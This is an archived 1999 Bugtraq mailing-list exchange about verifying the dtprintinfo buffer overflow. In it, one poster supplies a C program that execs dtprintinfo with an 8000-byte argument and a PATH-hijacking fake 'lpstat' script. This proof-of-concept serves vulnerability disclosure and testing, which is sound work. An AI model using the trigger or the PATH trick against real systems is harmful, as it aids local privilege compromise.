[10554] in bugtraq
Re: [Solaris2.6,2.7 dtprintinfo exploits]
daemon@ATHENA.MIT.EDU (Thiago MM Zaninotti)
Fri May 14 13:59:29 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Message-Id: <ISSMTP.98_21_.19990514121347.161I@unilever.com>
Date: Fri, 14 May 1999 12:13:47 -0300
Reply-To: Thiago MM Zaninotti <Thiago.M.M.Zaninotti@UNILEVER.COM>
From: Thiago MM Zaninotti <Thiago.M.M.Zaninotti@UNILEVER.COM>
X-To: Paul Hart <hart@iserver.com>
To: BUGTRAQ@NETSPACE.ORG
Hi Paul,
I'm sorry for the wrong output I've provided and you are correct: csh will
complain about long strings. I've already checked it in another shell and it
didn't appear to be vulnerable to the problem.
Thiago Zaninotti
IMC LABG
-----Original Message-----
From: Paul Hart [SMTP:hart@iserver.com]
Sent: Thursday, May 13, 1999 8:15 PM
To: Thiago MM Zaninotti
Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits]
On Wed, 12 May 1999, Thiago MM Zaninotti wrote:
> dtprintinfo in HPUX does not seen to be vulnerable to the overflow problem:
>
> % /usr/dt/bin/dtprintinfo -p `perl -e "print 'A' x 8000"`
> Pathname too long.
> %
That's a message from your shell, not the dtprintinfo program; the
dtprintinfo program is never being run. Your shell thinks that 8000
characters in an argument is too long. You'll need to use a different
shell that can handle long arguments (I use tcsh) or make a small C
program that execs dtprintinfo with the long command argument. This
should work:
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#define LENGTH 8000
void main()
{
char buffer[LENGTH];
memset(buffer, 'A', LENGTH);
buffer[LENGTH - 1] = '\0';
execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p", buffer, NULL);
printf("exec failed");
}
Also make sure (at least on Solaris) that you have a script in your
current directory named "lpstat" and that "." is the first element of your
PATH environment variable. Here's what I have for my lpstat script:
#!/bin/sh
echo "system for lpprn: localhost"
